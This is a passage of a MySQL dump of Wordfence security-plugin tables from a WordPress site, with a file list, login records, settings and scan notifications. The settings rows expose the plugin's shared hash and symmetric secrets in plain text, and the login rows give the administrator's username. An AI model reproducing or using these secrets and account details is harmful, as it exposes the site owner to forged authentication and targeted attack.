-includes/wp-includes/media-template.php'),(6772,'wp-includes/wp-includes/media.php'),(6773,'wp-includes/wp-includes/meta.php'),(6774,'wp-includes/wp-includes/ms-blogs.php'),(6775,'wp-includes/wp-includes/ms-default-constants.php'),(6776,'wp-includes/wp-includes/ms-default-filters.php'),(6777,'wp-includes/wp-includes/ms-deprecated.php'),(6778,'wp-includes/wp-includes/ms-files.php'),(6779,'wp-includes/wp-includes/ms-functions.php'),(6780,'wp-includes/wp-includes/ms-load.php'),(6781,'wp-includes/wp-includes/ms-network.php'),(6782,'wp-includes/wp-includes/ms-settings.php'),(6783,'wp-includes/wp-includes/ms-site.php'),(6784,'wp-includes/wp-includes/nav-menu-template.php'),(6785,'wp-includes/wp-includes/nav-menu.php'),(6786,'wp-includes/wp-includes/option.php'),(6787,'wp-includes/wp-includes/pluggable-deprecated.php'),(6788,'wp-includes/wp-includes/pluggable.php'),(6789,'wp-includes/wp-includes/plugin.php'),(6790,'wp-includes/wp-includes/post-formats.php'),(6791,'wp-includes/wp-includes/post-template.php'),(6792,'wp-includes/wp-includes/post-thumbnail-template.php'),(6793,'wp-includes/wp-includes/post.php'),(6794,'wp-includes/wp-includes/query.php'),(6795,'wp-includes/wp-includes/random_compat/byte_safe_strings.php'),(6796,'wp-includes/wp-includes/random_compat/cast_to_int.php'),(6797,'wp-includes/wp-includes/random_compat/error_polyfill.php'),(6798,'wp-includes/wp-includes/random_compat/random.php'),(6799,'wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php'),(6800,'wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php'),(6801,'wp-includes/wp-includes/random_compat/random_bytes_libsodium.php'),(6802,'wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(6803,'wp-includes/wp-includes/random_compat/random_bytes_mcrypt.php'),(6804,'wp-includes/wp-includes/random_compat/random_int.php'),(6805,'wp-includes/wp-includes/registration-functions.php'),(6806,'wp-includes/wp-includes/registration.php'),(6807,'wp-includes/wp-includes/rest-api/class-wp-rest-request.php'),(6808,'wp-includes/wp-includes/rest-api/class-wp-rest-response.php'),(6809,'wp-includes/wp-includes/rest-api/class-wp-rest-server.php'),(6810,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(6811,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(6812,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(6813,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(6814,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(6815,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(6816,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(6817,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(6818,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(6819,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(6820,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(6821,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(6822,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(6823,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(6824,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(6825,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(6826,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(6827,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(6828,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(6829,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(6830,'wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(6831,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(6832,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(6833,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(6834,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(6835,'wp-includes/wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(6836,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(6837,'wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(6838,'wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(6839,'wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(6840,'wp-includes/wp-includes/rest-api.php'),(6841,'wp-includes/wp-includes/revision.php'),(6842,'wp-includes/wp-includes/rewrite.php'),(6843,'wp-includes/wp-includes/robots-template.php'),(6844,'wp-includes/wp-includes/rss-functions.php'),(6845,'wp-includes/wp-includes/rss.php'),(6846,'wp-includes/wp-includes/script-loader.php'),(6847,'wp-includes/wp-includes/session.php'),(6848,'wp-includes/wp-includes/shortcodes.php'),(6849,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-index.php'),(6850,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(6851,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(6852,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(6853,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(6854,'wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php'),(6855,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(6856,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(6857,'wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(6858,'wp-includes/wp-includes/sitemaps.php'),(6859,'wp-includes/wp-includes/sodium_compat/LICENSE'),(6860,'wp-includes/wp-includes/sodium_compat/autoload-php7.php'),(6861,'wp-includes/wp-includes/sodium_compat/autoload.php'),(6862,'wp-includes/wp-includes/sodium_compat/composer.json'),(6863,'wp-includes/wp-includes/sodium_compat/lib/constants.php'),(6864,'wp-includes/wp-includes/sodium_compat/lib/namespaced.php'),(6865,'wp-includes/wp-includes/sodium_compat/lib/php72compat.php'),(6866,'wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php'),(6867,'wp-includes/wp-includes/sodium_compat/lib/sodium_compat.php'),(6868,'wp-includes/wp-includes/sodium_compat/namespaced/Compat.php'),(6869,'wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(6870,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(6871,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(6872,'wp-includes/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(6873,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(6874,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(6875,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(6876,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(6877,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(6878,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(6879,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(6880,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(6881,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(6882,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(6883,'wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(6884,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(6885,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(6886,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(6887,'wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(6888,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php'),(6889,'wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php'),(6890,'wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(6891,'wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(6892,'wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php'),(6893,'wp-includes/wp-includes/sodium_compat/namespaced/File.php'),(6894,'wp-includes/wp-includes/sodium_compat/src/Compat.php'),(6895,'wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(6896,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php'),(6897,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php'),(6898,'wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(6899,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(6900,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(6901,'wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php'),(6902,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(6903,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(6904,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(6905,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(6906,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(6907,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(6908,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(6909,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(6910,'wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php'),(6911,'wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php'),(6912,'wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php'),(6913,'wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php'),(6914,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(6915,'wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php'),(6916,'wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php'),(6917,'wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(6918,'wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php'),(6919,'wp-includes/wp-includes/sodium_compat/src/Core/Util.php'),(6920,'wp-includes/wp-includes/sodium_compat/src/Core/X25519.php'),(6921,'wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php'),(6922,'wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php'),(6923,'wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(6924,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(6925,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(6926,'wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(6927,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(6928,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(6929,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(6930,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(6931,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(6932,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(6933,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(6934,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(6935,'wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php'),(6936,'wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php'),(6937,'wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(6938,'wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(6939,'wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php'),(6940,'wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php'),(6941,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(6942,'wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php'),(6943,'wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php'),(6944,'wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(6945,'wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php'),(6946,'wp-includes/wp-includes/sodium_compat/src/Core32/Util.php'),(6947,'wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php'),(6948,'wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(6949,'wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(6950,'wp-includes/wp-includes/sodium_compat/src/Crypto.php'),(6951,'wp-includes/wp-includes/sodium_compat/src/Crypto32.php'),(6952,'wp-includes/wp-includes/sodium_compat/src/File.php'),(6953,'wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(6954,'wp-includes/wp-includes/sodium_compat/src/SodiumException.php'),(6955,'wp-includes/wp-includes/spl-autoload-compat.php'),(6956,'wp-includes/wp-includes/taxonomy.php'),(6957,'wp-includes/wp-includes/template-loader.php'),(6958,'wp-includes/wp-includes/template.php'),(6959,'wp-includes/wp-includes/theme-compat/comments.php'),(6960,'wp-includes/wp-includes/theme-compat/embed-404.php'),(6961,'wp-includes/wp-includes/theme-compat/embed-content.php'),(6962,'wp-includes/wp-includes/theme-compat/embed.php'),(6963,'wp-includes/wp-includes/theme-compat/footer-embed.php'),(6964,'wp-includes/wp-includes/theme-compat/footer.php'),(6965,'wp-includes/wp-includes/theme-compat/header-embed.php'),(6966,'wp-includes/wp-includes/theme-compat/header.php'),(6967,'wp-includes/wp-includes/theme-compat/sidebar.php'),(6968,'wp-includes/wp-includes/theme.php'),(6969,'wp-includes/wp-includes/update.php'),(6970,'wp-includes/wp-includes/user.php'),(6971,'wp-includes/wp-includes/vars.php'),(6972,'wp-includes/wp-includes/version.php'),(6973,'wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php'),(6974,'wp-includes/wp-includes/widgets/class-wp-widget-archives.php'),(6975,'wp-includes/wp-includes/widgets/class-wp-widget-calendar.php'),(6976,'wp-includes/wp-includes/widgets/class-wp-widget-categories.php'),(6977,'wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php'),(6978,'wp-includes/wp-includes/widgets/class-wp-widget-links.php'),(6979,'wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php'),(6980,'wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php'),(6981,'wp-includes/wp-includes/widgets/class-wp-widget-media-image.php'),(6982,'wp-includes/wp-includes/widgets/class-wp-widget-media-video.php'),(6983,'wp-includes/wp-includes/widgets/class-wp-widget-media.php'),(6984,'wp-includes/wp-includes/widgets/class-wp-widget-meta.php'),(6985,'wp-includes/wp-includes/widgets/class-wp-widget-pages.php'),(6986,'wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php'),(6987,'wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php'),(6988,'wp-includes/wp-includes/widgets/class-wp-widget-rss.php'),(6989,'wp-includes/wp-includes/widgets/class-wp-widget-search.php'),(6990,'wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php'),(6991,'wp-includes/wp-includes/widgets/class-wp-widget-text.php'),(6992,'wp-includes/wp-includes/widgets.php'),(6993,'wp-includes/wp-includes/wlwmanifest.xml'),(6994,'wp-includes/wp-includes/wp-db.php'),(6995,'wp-includes/wp-includes/wp-diff.php'),(6996,'wp-links-opml.php'),(6997,'wp-load.php'),(6998,'wp-login.php'),(6999,'wp-mail.php'),(7000,'wp-settings.php'),(7001,'wp-signup.php'),(7002,'wp-trackback.php'),(7003,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (1,1,1649844968.439825,0,'loginOK','AAD22133312errousGTRF44',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36'),(2,2,1649845332.664896,0,'loginOK','AAD22133312errousGTRF44',1,'\0\0\0\0\0\0\0\0\0\0����qH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_2fa_secrets`
--

LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfls_settings`
--

DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfls_settings`
--

LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('2fa-user-grace-period','10','yes'),('allow-disabling-ntp','1','yes'),('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('enable-woocommerce-integration','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1649844640','yes'),('ntp-failure-count','0','yes'),('ntp-offset','0.091164112091064','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','1c8810d0cad7989f3d4d864914c21f2f3c330226c4eba083420381c57e2228d7','yes'),('shared-symmetric-secret','ba0628454376f42bf5c5d400fa5859765d2f1a304e370f90d93a9a8a3e389d3a','yes'),('use-ntp','1','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfnotifications`
--

DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT 1,
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT 1000,
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfnotifications`
--

LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('network-GQ2TGNZV',0,'toupp-20211122',100,1657793933,'<p><strong>Wordfence Terms of Service and End User License Agreement Update</strong></p>\n<p>Please review the updated Terms of Service with the new Wordfence End User License Agreement.\n</p>\n<p><a href=\"https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20211122\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Service</a> <a href=\"https://www.wordfence.com/license-terms-and-conditions/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20211122\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">End User License Agreement</a></p>','[]'),('network-GQ2TGNZW',1,'toupp-20220714',100,1675160545,'<p><strong>Wordfence Terms of Service and UK IDTA</strong></p>\n<p>Please review the updated Terms of Service with the new UK IDTA.\n</p>\n<p><a href=\"https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Service</a> <a href=\"https://www.wordfence.com/uk-international-data-transfer-addendum/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">UK IDTA</a></p>\n','[]'),('site-2QAAAAA',0,'wfplugin_scan',502,1656065521,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1004 issues found in most recent scan</a>','[]'),('site-3QBQAAA',0,'wfplugin_scan',502,1670580951,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">9 issues found in most recent scan</a>','[]'),('site-44BAAAA',0,'wfplugin_scan',502,1665137473,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1006 issues found in most recent scan</a>','[]'),('site-4EAAAAA',1,'wfplugin_updates',502,1675160548,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/update-core.php\">Updates are available for 8 plugins and 1 theme</a>','[]'),('site-4IBQAAA',1,'wfplugin_scan',502,1675160552,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1006 issues found in most recent scan</a>','[]'),('site-AEAAAAA',0,'wfplugin_updates',502,1629388337,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/update-core.php\">An update is available for WordPress (v5.8)</a>','[]'),('site-AQAAAAA',0,'wfplugin_scan',502,1625221745,'<a href=\"https://www.dailyjolly.co.uk/wp-adminadmin.php?page=WordfenceScan\">1247 issues found in most recent scan</a>','[]'),('site-CQBQAAA',0,'wfplugin_scan',502,1667470743,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1006 issues found in most recent scan</a>','[]'),('site-EAAAAAA',0,'wfplugin_scan',502,1629728076,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1243 issues found in most recent scan</a>','[]'),('site-OMBQAAA',0,'wfplugin_scan',502,1670321918,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1006 issues found in most recent scan</a>','[]'),('site-YAAQAAA',0,'wfplugin_scan',502,1663841568,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1006 issues found in most recent scan</a>','[]'),('site-YUAAAAA',0,'wfplugin_updates',502,1649844723,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/update-core.php\">An update is available for 6 themes</a>','[]'),('site-YYAAAAA',0,'wfplugin_scan',502,1649844723,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">6 issues found in most recent scan</a>','[]'),('site-Z4AAAAA',0,'wfplugin_scan',502,1649845242,'<a href=\"https://www.dailyjolly.co.uk/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfpendingissues`
--

DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfpendingissues`
--

LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
